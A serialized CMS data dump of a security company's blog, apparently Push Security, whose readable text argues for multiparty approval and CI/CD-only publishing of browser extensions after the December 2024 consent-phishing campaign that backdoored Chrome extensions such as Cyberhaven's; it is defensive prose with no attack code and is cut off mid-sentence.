topic.",[],{},{"nodeType":312,"data":162416,"content":162420},{"target":162417},{"sys":162418},{"id":162419,"type":317,"linkType":318},"H7m9DHmbE945FO193oLYP",[],{"nodeType":178,"data":162422,"content":162423},{},[162424],{"nodeType":173,"value":37,"marks":162425,"data":162426},[],{},"5 ways to defeat identity-based attacks","In this blog post we will cover what identities are, how we secure perimeters in general, and and how this maps to the identity space.\n","2024-02-26T00:00:00.000Z","5-ways-to-defeat-identity-based-attacks",{"items":162432},[162433,162435],{"sys":162434,"name":26137},{"id":26136},{"sys":162436,"name":509},{"id":508},{"items":162438},[162439],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":162440},{"url":13981},{"__typename":1528,"sys":162442,"content":162443,"title":155968,"synopsis":155969,"hashTags":118,"publishedDate":155970,"slug":155971,"tagsCollection":162713,"authorsCollection":162719},{"id":155651},{"json":162444},{"data":162445,"content":162446,"nodeType":165},{},[162447,162453,162459,162475,162491,162512,162518,162531,162537,162543,162549,162552,162558,162574,162590,162595,162611,162617,162623,162628,162634,162639,162665,162671,162687,162690,162696,162702,162707],{"data":162448,"content":162449,"nodeType":169},{},[162450],{"data":162451,"marks":162452,"value":155662,"nodeType":173},{},[],{"data":162454,"content":162455,"nodeType":178},{},[162456],{"data":162457,"marks":162458,"value":155669,"nodeType":173},{},[],{"data":162460,"content":162461,"nodeType":178},{},[162462,162465,162472],{"data":162463,"marks":162464,"value":155676,"nodeType":173},{},[],{"data":162466,"content":162467,"nodeType":186},{"uri":155679},[162468],{"data":162469,"marks":162470,"value":155685,"nodeType":173},{},[162471],{"type":194},{"data":162473,"marks":162474,"value":197,"nodeType":173},{},[],{"data":162476,"content":162477,"nodeType":178},{},[162478,162481,162488],{"data":162479,"marks":162480,"value":155695,"nodeType":173},{},[],{"data":162482,"content":162483,"nodeType":186},{"uri":4492},[162484],{"data":162485,"marks":162486,"value":155703,"nodeType":173},{},[162487],{"type":194},{"data":162489,"marks":162490,"value":39946,"nodeType":173},{},[],{"data":162492,"content":162493,"nodeType":250},{},[162494,162503],{"data":162495,"content":162496,"nodeType":254},{},[162497],{"data":162498,"content":162499,"nodeType":178},{},[162500],{"data":162501,"marks":162502,"value":155719,"nodeType":173},{},[],{"data":162504,"content":162505,"nodeType":254},{},[162506],{"data":162507,"content":162508,"nodeType":178},{},[162509],{"data":162510,"marks":162511,"value":155729,"nodeType":173},{},[],{"data":162513,"content":162514,"nodeType":178},{},[162515],{"data":162516,"marks":162517,"value":155736,"nodeType":173},{},[],{"data":162519,"content":162520,"nodeType":178},{},[162521,162524,162528],{"data":162522,"marks":162523,"value":155743,"nodeType":173},{},[],{"data":162525,"marks":162526,"value":155748,"nodeType":173},{},[162527],{"type":194},{"data":162529,"marks":162530,"value":155752,"nodeType":173},{},[],{"data":162532,"content":162533,"nodeType":178},{},[162534],{"data":162535,"marks":162536,"value":155759,"nodeType":173},{},[],{"data":162538,"content":162539,"nodeType":178},{},[162540],{"data":162541,"marks":162542,"value":155766,"nodeType":173},{},[],{"data":162544,"content":162545,"nodeType":178},{},[162546],{"data":162547,"marks":162548,"value":155773,"nodeType":173},{},[],{"data":162550,"content":162551,"nodeType":231},{},[],{"data":162553,"content":162554,"nodeType":169},{},[162555],{"data":162556,"marks":162557,"value":155783,"nodeType":173},{},[],{"data":162559,"content":162560,"nodeType":178},{},[162561,162564,162571],{"data":162562,"marks":162563,"value":155790,"nodeType":173},{},[],{"data":162565,"content":162566,"nodeType":186},{"uri":155793},[162567],{"data":162568,"marks":162569,"value":155799,"nodeType":173},{},[162570],{"type":194},{"data":162572,"marks":162573,"value":155803,"nodeType":173},{},[],{"data":162575,"content":162576,"nodeType":178},{},[162577,162580,162587],{"data":162578,"marks":162579,"value":155810,"nodeType":173},{},[],{"data":162581,"content":162582,"nodeType":186},{"uri":62639},[162583],{"data":162584,"marks":162585,"value":155818,"nodeType":173},{},[162586],{"type":194},{"data":162588,"marks":162589,"value":197,"nodeType":173},{},[],{"data":162591,"content":162594,"nodeType":312},{"target":162592},{"sys":162593},{"id":155826,"type":317,"linkType":318},[],{"data":162596,"content":162597,"nodeType":178},{},[162598,162601,162608],{"data":162599,"marks":162600,"value":155834,"nodeType":173},{},[],{"data":162602,"content":162603,"nodeType":186},{"uri":3751},[162604],{"data":162605,"marks":162606,"value":155842,"nodeType":173},{},[162607],{"type":194},{"data":162609,"marks":162610,"value":155846,"nodeType":173},{},[],{"data":162612,"content":162613,"nodeType":235},{},[162614],{"data":162615,"marks":162616,"value":155853,"nodeType":173},{},[],{"data":162618,"content":162619,"nodeType":178},{},[162620],{"data":162621,"marks":162622,"value":155860,"nodeType":173},{},[],{"data":162624,"content":162627,"nodeType":312},{"target":162625},{"sys":162626},{"id":155865,"type":317,"linkType":318},[],{"data":162629,"content":162630,"nodeType":178},{},[162631],{"data":162632,"marks":162633,"value":155873,"nodeType":173},{},[],{"data":162635,"content":162638,"nodeType":312},{"target":162636},{"sys":162637},{"id":155878,"type":317,"linkType":318},[],{"data":162640,"content":162641,"nodeType":178},{},[162642,162645,162652,162655,162662],{"data":162643,"marks":162644,"value":155886,"nodeType":173},{},[],{"data":162646,"content":162647,"nodeType":186},{"uri":155889},[162648],{"data":162649,"marks":162650,"value":155895,"nodeType":173},{},[162651],{"type":194},{"data":162653,"marks":162654,"value":155899,"nodeType":173},{},[],{"data":162656,"content":162657,"nodeType":186},{"uri":155902},[162658],{"data":162659,"marks":162660,"value":155908,"nodeType":173},{},[162661],{"type":194},{"data":162663,"marks":162664,"value":155912,"nodeType":173},{},[],{"data":162666,"content":162667,"nodeType":178},{},[162668],{"data":162669,"marks":162670,"value":155919,"nodeType":173},{},[],{"data":162672,"content":162673,"nodeType":178},{},[162674,162677,162684],{"data":162675,"marks":162676,"value":155926,"nodeType":173},{},[],{"data":162678,"content":162679,"nodeType":186},{"uri":9099},[162680],{"data":162681,"marks":162682,"value":155934,"nodeType":173},{},[162683],{"type":194},{"data":162685,"marks":162686,"value":155938,"nodeType":173},{},[],{"data":162688,"content":162689,"nodeType":231},{},[],{"data":162691,"content":162692,"nodeType":169},{},[162693],{"data":162694,"marks":162695,"value":155948,"nodeType":173},{},[],{"data":162697,"content":162698,"nodeType":178},{},[162699],{"data":162700,"marks":162701,"value":155955,"nodeType":173},{},[],{"data":162703,"content":162706,"nodeType":312},{"target":162704},{"sys":162705},{"id":155960,"type":317,"linkType":318},[],{"data":162708,"content":162709,"nodeType":178},{},[162710],{"data":162711,"marks":162712,"value":37,"nodeType":173},{},[],{"items":162714},[162715,162717],{"sys":162716,"name":26137},{"id":26136},{"sys":162718,"name":509},{"id":508},{"items":162720},[162721],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":162722},{"url":155985},{"__typename":1528,"sys":162724,"content":162725,"title":114081,"synopsis":150597,"hashTags":118,"publishedDate":150598,"slug":114082,"tagsCollection":163265,"authorsCollection":163269},{"id":113695},{"json":162726},{"nodeType":165,"data":162727,"content":162728},{},[162729,162735,162741,162747,162763,162769,162775,162778,162785,162791,162797,162803,162808,162814,162817,162824,162830,162836,162842,162848,162853,162859,162862,162869,162876,162882,162888,162894,162910,162917,162923,162929,162935,162941,162948,162954,162960,162965,162968,162975,162981,162987,162993,162999,163005,163008,163015,163021,163027,163033,163039,163045,163143,163156,163162,163167,163170,163177,163183,163243,163249],{"nodeType":178,"data":162730,"content":162731},{},[162732],{"nodeType":173,"value":149989,"marks":162733,"data":162734},[],{},{"nodeType":178,"data":162736,"content":162737},{},[162738],{"nodeType":173,"value":149996,"marks":162739,"data":162740},[],{},{"nodeType":178,"data":162742,"content":162743},{},[162744],{"nodeType":173,"value":150003,"marks":162745,"data":162746},[],{},{"nodeType":178,"data":162748,"content":162749},{},[162750,162753,162760],{"nodeType":173,"value":150010,"marks":162751,"data":162752},[],{},{"nodeType":186,"data":162754,"content":162755},{"uri":150015},[162756],{"nodeType":173,"value":150018,"marks":162757,"data":162759},[162758],{"type":194},{},{"nodeType":173,"value":1477,"marks":162761,"data":162762},[],{},{"nodeType":178,"data":162764,"content":162765},{},[162766],{"nodeType":173,"value":150029,"marks":162767,"data":162768},[],{},{"nodeType":178,"data":162770,"content":162771},{},[162772],{"nodeType":173,"value":150036,"marks":162773,"data":162774},[],{},{"nodeType":231,"data":162776,"content":162777},{},[],{"nodeType":169,"data":162779,"content":162780},{},[162781],{"nodeType":173,"value":150046,"marks":162782,"data":162784},[162783],{"type":370},{},{"nodeType":178,"data":162786,"content":162787},{},[162788],{"nodeType":173,"value":150054,"marks":162789,"data":162790},[],{},{"nodeType":178,"data":162792,"content":162793},{},[162794],{"nodeType":173,"value":150061,"marks":162795,"data":162796},[],{},{"nodeType":178,"data":162798,"content":162799},{},[162800],{"nodeType":173,"value":150068,"marks":162801,"data":162802},[],{},{"nodeType":312,"data":162804,"content":162807},{"target":162805},{"sys":162806},{"id":150075,"type":317,"linkType":318},[],{"nodeType":178,"data":162809,"content":162810},{},[162811],{"nodeType":173,"value":150081,"marks":162812,"data":162813},[],{},{"nodeType":231,"data":162815,"content":162816},{},[],{"nodeType":169,"data":162818,"content":162819},{},[162820],{"nodeType":173,"value":150091,"marks":162821,"data":162823},[162822],{"type":370},{},{"nodeType":178,"data":162825,"content":162826},{},[162827],{"nodeType":173,"value":150099,"marks":162828,"data":162829},[],{},{"nodeType":178,"data":162831,"content":162832},{},[162833],{"nodeType":173,"value":150106,"marks":162834,"data":162835},[],{},{"nodeType":178,"data":162837,"content":162838},{},[162839],{"nodeType":173,"value":150113,"marks":162840,"data":162841},[],{},{"nodeType":178,"data":162843,"content":162844},{},[162845],{"nodeType":173,"value":150120,"marks":162846,"data":162847},[],{},{"nodeType":312,"data":162849,"content":162852},{"target":162850},{"sys":162851},{"id":150127,"type":317,"linkType":318},[],{"nodeType":178,"data":162854,"content":162855},{},[162856],{"nodeType":173,"value":150133,"marks":162857,"data":162858},[],{},{"nodeType":231,"data":162860,"content":162861},{},[],{"nodeType":169,"data":162863,"content":162864},{},[162865],{"nodeType":173,"value":150143,"marks":162866,"data":162868},[162867],{"type":370},{},{"nodeType":235,"data":162870,"content":162871},{},[162872],{"nodeType":173,"value":150151,"marks":162873,"data":162875},[162874],{"type":370},{},{"nodeType":178,"data":162877,"content":162878},{},[162879],{"nodeType":173,"value":150159,"marks":162880,"data":162881},[],{},{"nodeType":178,"data":162883,"content":162884},{},[162885],{"nodeType":173,"value":150166,"marks":162886,"data":162887},[],{},{"nodeType":178,"data":162889,"content":162890},{},[162891],{"nodeType":173,"value":150173,"marks":162892,"data":162893},[],{},{"nodeType":178,"data":162895,"content":162896},{},[162897,162900,162907],{"nodeType":173,"value":150180,"marks":162898,"data":162899},[],{},{"nodeType":186,"data":162901,"content":162902},{"uri":139925},[162903],{"nodeType":173,"value":150187,"marks":162904,"data":162906},[162905],{"type":194},{},{"nodeType":173,"value":150192,"marks":162908,"data":162909},[],{},{"nodeType":235,"data":162911,"content":162912},{},[162913],{"nodeType":173,"value":150199,"marks":162914,"data":162916},[162915],{"type":370},{},{"nodeType":178,"data":162918,"content":162919},{},[162920],{"nodeType":173,"value":150207,"marks":162921,"data":162922},[],{},{"nodeType":178,"data":162924,"content":162925},{},[162926],{"nodeType":173,"value":150214,"marks":162927,"data":162928},[],{},{"nodeType":178,"data":162930,"content":162931},{},[162932],{"nodeType":173,"value":150221,"marks":162933,"data":162934},[],{},{"nodeType":178,"data":162936,"content":162937},{},[162938],{"nodeType":173,"value":150228,"marks":162939,"data":162940},[],{},{"nodeType":235,"data":162942,"content":162943},{},[162944],{"nodeType":173,"value":150235,"marks":162945,"data":162947},[162946],{"type":370},{},{"nodeType":178,"data":162949,"content":162950},{},[162951],{"nodeType":173,"value":150243,"marks":162952,"data":162953},[],{},{"nodeType":178,"data":162955,"content":162956},{},[162957],{"nodeType":173,"value":150250,"marks":162958,"data":162959},[],{},{"nodeType":312,"data":162961,"content":162964},{"target":162962},{"sys":162963},{"id":150257,"type":317,"linkType":318},[],{"nodeType":231,"data":162966,"content":162967},{},[],{"nodeType":169,"data":162969,"content":162970},{},[162971],{"nodeType":173,"value":150266,"marks":162972,"data":162974},[162973],{"type":370},{},{"nodeType":178,"data":162976,"content":162977},{},[162978],{"nodeType":173,"value":150274,"marks":162979,"data":162980},[],{},{"nodeType":178,"data":162982,"content":162983},{},[162984],{"nodeType":173,"value":150281,"marks":162985,"data":162986},[],{},{"nodeType":178,"data":162988,"content":162989},{},[162990],{"nodeType":173,"value":150288,"marks":162991,"data":162992},[],{},{"nodeType":178,"data":162994,"content":162995},{},[162996],{"nodeType":173,"value":150295,"marks":162997,"data":162998},[],{},{"nodeType":178,"data":163000,"content":163001},{},[163002],{"nodeType":173,"value":150302,"marks":163003,"data":163004},[],{},{"nodeType":231,"data":163006,"content":163007},{},[],{"nodeType":169,"data":163009,"content":163010},{},[163011],{"nodeType":173,"value":150312,"marks":163012,"data":163014},[163013],{"type":370},{},{"nodeType":178,"data":163016,"content":163017},{},[163018],{"nodeType":173,"value":150320,"marks":163019,"data":163020},[],{},{"nodeType":178,"data":163022,"content":163023},{},[163024],{"nodeType":173,"value":150327,"marks":163025,"data":163026},[],{},{"nodeType":178,"data":163028,"content":163029},{},[163030],{"nodeType":173,"value":150334,"marks":163031,"data":163032},[],{},{"nodeType":178,"data":163034,"content":163035},{},[163036],{"nodeType":173,"value":150341,"marks":163037,"data":163038},[],{},{"nodeType":178,"data":163040,"content":163041},{},[163042],{"nodeType":173,"value":150348,"marks":163043,"data":163044},[],{},{"nodeType":250,"data":163046,"content":163047},{},[163048,163067,163086,163105,163124],{"nodeType":254,"data":163049,"content":163050},{},[163051],{"nodeType":178,"data":163052,"content":163053},{},[163054,163057,163064],{"nodeType":173,"value":150361,"marks":163055,"data":163056},[],{},{"nodeType":186,"data":163058,"content":163059},{"uri":125982},[163060],{"nodeType":173,"value":1300,"marks":163061,"data":163063},[163062],{"type":194},{},{"nodeType":173,"value":53584,"marks":163065,"data":163066},[],{},{"nodeType":254,"data":163068,"content":163069},{},[163070],{"nodeType":178,"data":163071,"content":163072},{},[163073,163076,163083],{"nodeType":173,"value":150381,"marks":163074,"data":163075},[],{},{"nodeType":186,"data":163077,"content":163078},{"uri":150386},[163079],{"nodeType":173,"value":150389,"marks":163080,"data":163082},[163081],{"type":194},{},{"nodeType":173,"value":53584,"marks":163084,"data":163085},[],{},{"nodeType":254,"data":163087,"content":163088},{},[163089],{"nodeType":178,"data":163090,"content":163091},{},[163092,163095,163102],{"nodeType":173,"value":150403,"marks":163093,"data":163094},[],{},{"nodeType":186,"data":163096,"content":163097},{"uri":150408},[163098],{"nodeType":173,"value":150411,"marks":163099,"data":163101},[163100],{"type":194},{},{"nodeType":173,"value":53584,"marks":163103,"data":163104},[],{},{"nodeType":254,"data":163106,"content":163107},{},[163108],{"nodeType":178,"data":163109,"content":163110},{},[163111,163114,163121],{"nodeType":173,"value":150425,"marks":163112,"data":163113},[],{},{"nodeType":186,"data":163115,"content":163116},{"uri":125812},[163117],{"nodeType":173,"value":1255,"marks":163118,"data":163120},[163119],{"type":194},{},{"nodeType":173,"value":53584,"marks":163122,"data":163123},[],{},{"nodeType":254,"data":163125,"content":163126},{},[163127],{"nodeType":178,"data":163128,"content":163129},{},[163130,163133,163140],{"nodeType":173,"value":150445,"marks":163131,"data":163132},[],{},{"nodeType":186,"data":163134,"content":163135},{"uri":150450},[163136],{"nodeType":173,"value":96495,"marks":163137,"data":163139},[163138],{"type":194},{},{"nodeType":173,"value":53584,"marks":163141,"data":163142},[],{},{"nodeType":178,"data":163144,"content":163145},{},[163146,163149,163153],{"nodeType":173,"value":150463,"marks":163147,"data":163148},[],{},{"nodeType":173,"value":150467,"marks":163150,"data":163152},[163151],{"type":370},{},{"nodeType":173,"value":150472,"marks":163154,"data":163155},[],{},{"nodeType":178,"data":163157,"content":163158},{},[163159],{"nodeType":173,"value":150479,"marks":163160,"data":163161},[],{},{"nodeType":312,"data":163163,"content":163166},{"target":163164},{"sys":163165},{"id":150486,"type":317,"linkType":318},[],{"nodeType":231,"data":163168,"content":163169},{},[],{"nodeType":169,"data":163171,"content":163172},{},[163173],{"nodeType":173,"value":150495,"marks":163174,"data":163176},[163175],{"type":370},{},{"nodeType":178,"data":163178,"content":163179},{},[163180],{"nodeType":173,"value":150503,"marks":163181,"data":163182},[],{},{"nodeType":250,"data":163184,"content":163185},{},[163186,163215,163234],{"nodeType":254,"data":163187,"content":163188},{},[163189],{"nodeType":178,"data":163190,"content":163191},{},[163192,163195,163202,163205,163212],{"nodeType":173,"value":37,"marks":163193,"data":163194},[],{},{"nodeType":186,"data":163196,"content":163197},{"uri":62639},[163198],{"nodeType":173,"value":150522,"marks":163199,"data":163201},[163200],{"type":194},{},{"nodeType":173,"value":150527,"marks":163203,"data":163204},[],{},{"nodeType":186,"data":163206,"content":163207},{"uri":125749},[163208],{"nodeType":173,"value":150534,"marks":163209,"data":163211},[163210],{"type":194},{},{"nodeType":173,"value":150539,"marks":163213,"data":163214},[],{},{"nodeType":254,"data":163216,"content":163217},{},[163218],{"nodeType":178,"data":163219,"content":163220},{},[163221,163224,163231],{"nodeType":173,"value":37,"marks":163222,"data":163223},[],{},{"nodeType":186,"data":163225,"content":163226},{"uri":4751},[163227],{"nodeType":173,"value":150555,"marks":163228,"data":163230},[163229],{"type":194},{},{"nodeType":173,"value":150560,"marks":163232,"data":163233},[],{},{"nodeType":254,"data":163235,"content":163236},{},[163237],{"nodeType":178,"data":163238,"content":163239},{},[163240],{"nodeType":173,"value":150570,"marks":163241,"data":163242},[],{},{"nodeType":178,"data":163244,"content":163245},{},[163246],{"nodeType":173,"value":150577,"marks":163247,"data":163248},[],{},{"nodeType":178,"data":163250,"content":163251},{},[163252,163255,163262],{"nodeType":173,"value":150584,"marks":163253,"data":163254},[],{},{"nodeType":186,"data":163256,"content":163257},{"uri":1469},[163258],{"nodeType":173,"value":71815,"marks":163259,"data":163261},[163260],{"type":194},{},{"nodeType":173,"value":1477,"marks":163263,"data":163264},[],{},{"items":163266},[163267],{"sys":163268,"name":505},{"id":504},{"items":163270},[163271],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":163272},{"url":1496},{"items":163274},[163275],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":163276},{"url":13981},{"json":163278,"links":164503},{"nodeType":165,"data":163279,"content":163280},{},[163281,163288,163291,163298,163305,163338,163345,163348,163355,163374,163406,163413,163420,163423,163430,163437,163444,163467,163474,163481,163484,163491,163498,163505,163512,163519,163526,163533,163540,163547,163554,163587,163594,163601,163604,163611,163618,163624,163631,163664,163671,163674,163681,163688,163695,163718,163725,163732,163739,163746,163753,163760,163767,163774,163807,163850,163857,163864,163871,163878,163885,163892,163899,163947,163953,163973,163980,164013,164020,164026,164029,164036,164043,164050,164057,164064,164071,164078,164085,164092,164095,164102,164109,164116,164123,164143,164150,164157,164190,164197,164204,164211,164218,164225,164291,164294,164301,164308,164351,164354,164360,164367,164387,164394,164401,164408,164411,164418,164425,164432,164452,164459,164466,164473,164480,164487],{"nodeType":178,"data":163282,"content":163283},{},[163284],{"nodeType":173,"value":163285,"marks":163286,"data":163287},"Inline with what was targeted in this campaign, our focus here is on the extension deployment process. All browser vendors stand to benefit from greater security in this area — we hope that sharing what we’ve learned is useful, and look forward to comments and feedback so we can collectively reduce the scope for attacks on browser extensions in the future. ",[],{},{"nodeType":231,"data":163289,"content":163290},{},[],{"nodeType":169,"data":163292,"content":163293},{},[163294],{"nodeType":173,"value":163295,"marks":163296,"data":163297},"TL;DR",[],{},{"nodeType":178,"data":163299,"content":163300},{},[163301],{"nodeType":173,"value":163302,"marks":163303,"data":163304},"In this blog, we’ll start with some background and walk through the “why” before discussing the key improvements that we feel are needed. But if you don’t care about the why or just want to cut to the chase, the key parts of defending against these attacks are:",[],{},{"nodeType":250,"data":163306,"content":163307},{},[163308,163318,163328],{"nodeType":254,"data":163309,"content":163310},{},[163311],{"nodeType":178,"data":163312,"content":163313},{},[163314],{"nodeType":173,"value":163315,"marks":163316,"data":163317},"Disable always-on access for all users to the browser extension store developer portals — you need to automate deployments through CI/CD to enable this.",[],{},{"nodeType":254,"data":163319,"content":163320},{},[163321],{"nodeType":178,"data":163322,"content":163323},{},[163324],{"nodeType":173,"value":163325,"marks":163326,"data":163327},"Implement a multiparty approval process for extension deployments.",[],{},{"nodeType":254,"data":163329,"content":163330},{},[163331],{"nodeType":178,"data":163332,"content":163333},{},[163334],{"nodeType":173,"value":163335,"marks":163336,"data":163337},"Secure your admin identities.",[],{},{"nodeType":178,"data":163339,"content":163340},{},[163341],{"nodeType":173,"value":163342,"marks":163343,"data":163344},"For details of how to do this practically, skip ahead to the “Recommended security architecture” section.",[],{},{"nodeType":231,"data":163346,"content":163347},{},[],{"nodeType":169,"data":163349,"content":163350},{},[163351],{"nodeType":173,"value":163352,"marks":163353,"data":163354},"Background: The Cyberhaven incident",[],{},{"nodeType":178,"data":163356,"content":163357},{},[163358,163362,163370],{"nodeType":173,"value":163359,"marks":163360,"data":163361},"In December 2024, a campaign targeting browser extension developers was launched, and succeeded in compromising at least ",[],{},{"nodeType":186,"data":163363,"content":163364},{"uri":60487},[163365],{"nodeType":173,"value":163366,"marks":163367,"data":163369},"35 Google Chrome extensions",[163368],{"type":194},{},{"nodeType":173,"value":163371,"marks":163372,"data":163373},". Cyberhaven’s extension was the most notable of these, and the campaign has inherited their name.",[],{},{"nodeType":178,"data":163375,"content":163376},{},[163377,163381,163389,163393,163402],{"nodeType":173,"value":163378,"marks":163379,"data":163380},"The campaign targeted extension devs through the support email address listed on the extension stores, but notably, the ",[],{},{"nodeType":186,"data":163382,"content":163383},{"uri":19838},[163384],{"nodeType":173,"value":163385,"marks":163386,"data":163388},"consent phishing attack technique",[163387],{"type":194},{},{"nodeType":173,"value":163390,"marks":163391,"data":163392}," was used. While not a new technique, it has rarely been seen — especially given how powerful it is. Rather than a traditional credential and MFA phishing attacks which harvest credentials (or session tokens to bypass MFA), with consent phishing the attacker's goal is to trick the victim into granting them an OAuth token to perform actions on their behalf. In this case the permission or scope used by the attacker granted that token the ability to upload and publish new versions of the victim’s extension to the Chrome Web Store — which in this case included some backdoor code that executed commands that were dynamically configured by the attacker. For more in-depth information, see the ",[],{},{"nodeType":186,"data":163394,"content":163396},{"uri":163395},"https://secureannex.com/blog/cyberhaven-extension-compromise/",[163397],{"nodeType":173,"value":163398,"marks":163399,"data":163401},"excellent analysis",[163400],{"type":194},{},{"nodeType":173,"value":163403,"marks":163404,"data":163405}," by the Secure Annex team.",[],{},{"nodeType":178,"data":163407,"content":163408},{},[163409],{"nodeType":173,"value":163410,"marks":163411,"data":163412},"Because of the dynamic nature of the commands sent to backdoored extensions, it’s difficult to be sure what the impact was — but whatever the case was in this specific incident, it’s perhaps more useful to understand what the impact to users might be so we can work to mitigate future attacks.",[],{},{"nodeType":178,"data":163414,"content":163415},{},[163416],{"nodeType":173,"value":163417,"marks":163418,"data":163419},"The simple fact is that for most common extensions that operate across multiple sites (like ad-blockers etc.), using fairly typical permissions, a backdoor would likely be able to reach credentials and session tokens. This would mean an attacker could use a backdoored extension to get access to a user’s accounts on various websites. This poses a very high impact to users, and something that all extension developers should be focused on preventing. ",[],{},{"nodeType":231,"data":163421,"content":163422},{},[],{"nodeType":169,"data":163424,"content":163425},{},[163426],{"nodeType":173,"value":163427,"marks":163428,"data":163429},"How do we stop the next iteration of this attack?",[],{},{"nodeType":178,"data":163431,"content":163432},{},[163433],{"nodeType":173,"value":163434,"marks":163435,"data":163436},"Given the value of the data, the relative ease with which this attack was performed (vs. for example something like a browser 0-day), and the success of the attack, it seems very likely this type of attack will happen again. As we saw in 2024, the success of the attacks on Snowflake customers gave rise to a huge increase in infostealer attacks. Attackers are quick to identify areas of potential opportunity and capitalize on them.",[],{},{"nodeType":178,"data":163438,"content":163439},{},[163440],{"nodeType":173,"value":163441,"marks":163442,"data":163443},"As an extension user, you should be mainly worried about one of two scenarios;",[],{},{"nodeType":250,"data":163445,"content":163446},{},[163447,163457],{"nodeType":254,"data":163448,"content":163449},{},[163450],{"nodeType":178,"data":163451,"content":163452},{},[163453],{"nodeType":173,"value":163454,"marks":163455,"data":163456},"The developer of the extension adds malicious code to an extension, they publish the update to the app store, your browser automatically updates, and malicious code runs in your browser",[],{},{"nodeType":254,"data":163458,"content":163459},{},[163460],{"nodeType":178,"data":163461,"content":163462},{},[163463],{"nodeType":173,"value":163464,"marks":163465,"data":163466},"The developer of your extension is attacked, and the attacker gains access to publish an updated version of the extension to the app store, and uses this to push an update that includes their backdoor, your browser automatically updates, and malicious code runs in your browser",[],{},{"nodeType":178,"data":163468,"content":163469},{},[163470],{"nodeType":173,"value":163471,"marks":163472,"data":163473},"However, since we’re writing this for honest extension developers, and these attacks targeted the second scenario, that’s what we’ll be focussing on. ",[],{},{"nodeType":178,"data":163475,"content":163476},{},[163477],{"nodeType":173,"value":163478,"marks":163479,"data":163480},"The challenge then is to make sure that only legitimate developers can push updates to the extension store. Easy to say, harder to do in the real world.",[],{},{"nodeType":231,"data":163482,"content":163483},{},[],{"nodeType":169,"data":163485,"content":163486},{},[163487],{"nodeType":173,"value":163488,"marks":163489,"data":163490},"Primer on extension stores and the publication process",[],{},{"nodeType":178,"data":163492,"content":163493},{},[163494],{"nodeType":173,"value":163495,"marks":163496,"data":163497},"As a light intro for folks that aren’t extension developers but are still interested, here’s a very brief description of this process. It’s not critical to understand the inner workings and differences between the stores to follow this blog, but it is very interesting (in my opinion). ",[],{},{"nodeType":178,"data":163499,"content":163500},{},[163501],{"nodeType":173,"value":163502,"marks":163503,"data":163504},"At Push we publish to three main extension stores; Chrome Web Store (this lets us cover all the Chromium-based browsers including Edge and Arc), Firefox Add-ons, and the Apple Store, so these are the stores we’re covering here.",[],{},{"nodeType":178,"data":163506,"content":163507},{},[163508],{"nodeType":173,"value":163509,"marks":163510,"data":163511},"The generic process is the same for all stores. To publish an update, you first build (or package, really) your extension source, upload it to your tenant/team/org in the store, and publish it. The publishing step triggers a manual review process in the Chrome and Apple stores, and once complete, the new version appears on the extension stores. In Firefox it goes straight out immediately.",[],{},{"nodeType":178,"data":163513,"content":163514},{},[163515],{"nodeType":173,"value":163516,"marks":163517,"data":163518},"A note on the reviews; if you aren’t adding new permissions (something we haven’t seen attackers do because it triggers a new interactive approval for the end-user when the extension is updated — something an attacker wants to avoid to evade detection) then our experience is that the the manual review process is typically fairly cursory. This is likely why the checks implemented at the store level failed to discover malicious updates in these cases.",[],{},{"nodeType":178,"data":163520,"content":163521},{},[163522],{"nodeType":173,"value":163523,"marks":163524,"data":163525},"While it’s possible to do this process completely manually, developers often automate builds and include some of the deployment steps above in the build automation process — I’ll use the term CI/CD to refer to this build and deployment process in the rest of this piece. All three stores provide API keys (albeit in different ways) to enable this process.",[],{},{"nodeType":178,"data":163527,"content":163528},{},[163529],{"nodeType":173,"value":163530,"marks":163531,"data":163532},"I’ll leave it there for now, but again see the “Extension store differences” section in the Appendix for more detail.",[],{},{"nodeType":235,"data":163534,"content":163535},{},[163536],{"nodeType":173,"value":163537,"marks":163538,"data":163539},"So what's the problem with the stores?",[],{},{"nodeType":178,"data":163541,"content":163542},{},[163543],{"nodeType":173,"value":163544,"marks":163545,"data":163546},"Ok, so far it sounds like the stores are all pretty standardised, so what's the actual problem here? Why did these attacks succeed?",[],{},{"nodeType":178,"data":163548,"content":163549},{},[163550],{"nodeType":173,"value":163551,"marks":163552,"data":163553},"There are a few notable control gaps relating to the extension stores which made this attack possible, and could have mitigated it were they in place. ",[],{},{"nodeType":250,"data":163555,"content":163556},{},[163557,163567,163577],{"nodeType":254,"data":163558,"content":163559},{},[163560],{"nodeType":178,"data":163561,"content":163562},{},[163563],{"nodeType":173,"value":163564,"marks":163565,"data":163566},"Despite the massive risk related to publishing a malicious extension, none of the mainstream stores provide a mechanism to implement a multiparty approval process, increasing the number of successful phishing attempts required. ",[],{},{"nodeType":254,"data":163568,"content":163569},{},[163570],{"nodeType":178,"data":163571,"content":163572},{},[163573],{"nodeType":173,"value":163574,"marks":163575,"data":163576},"Due to the lack of granular permissions in the Chrome store, any dev with access to the store could be phished. A slightly more granular permission model — for example the ability to have one developer with the permission to upload an extension (but not publish it), and another with the ability to publish an uploaded extension (but not upload a new package) — could have addressed this. ",[],{},{"nodeType":254,"data":163578,"content":163579},{},[163580],{"nodeType":178,"data":163581,"content":163582},{},[163583],{"nodeType":173,"value":163584,"marks":163585,"data":163586},"No log stream that could be easily ingested by a SIEM tool is provided, making it much harder to detect and respond. ",[],{},{"nodeType":178,"data":163588,"content":163589},{},[163590],{"nodeType":173,"value":163591,"marks":163592,"data":163593},"But alas, we’re not here to complain about the stores — that’s a different blog post — we’re here to solve problems today!",[],{},{"nodeType":178,"data":163595,"content":163596},{},[163597],{"nodeType":173,"value":163598,"marks":163599,"data":163600},"I mentioned before that a multiparty approval process is key. But to understand why, it’s useful to think about this in terms of how this system will be attacked. Threat or attack models are typical approaches to doing this.",[],{},{"nodeType":231,"data":163602,"content":163603},{},[],{"nodeType":169,"data":163605,"content":163606},{},[163607],{"nodeType":173,"value":163608,"marks":163609,"data":163610},"Attack model for publishing a malicious extension",[],{},{"nodeType":178,"data":163612,"content":163613},{},[163614],{"nodeType":173,"value":163615,"marks":163616,"data":163617},"The main attack paths enabling an attacker to publish a malicious extension are outlined below. ",[],{},{"nodeType":312,"data":163619,"content":163623},{"target":163620},{"sys":163621},{"id":163622,"type":317,"linkType":318},"2RQTz9QmPxOxAvy4EtXIQZ",[],{"nodeType":178,"data":163625,"content":163626},{},[163627],{"nodeType":173,"value":163628,"marks":163629,"data":163630},"You don’t need to follow all the 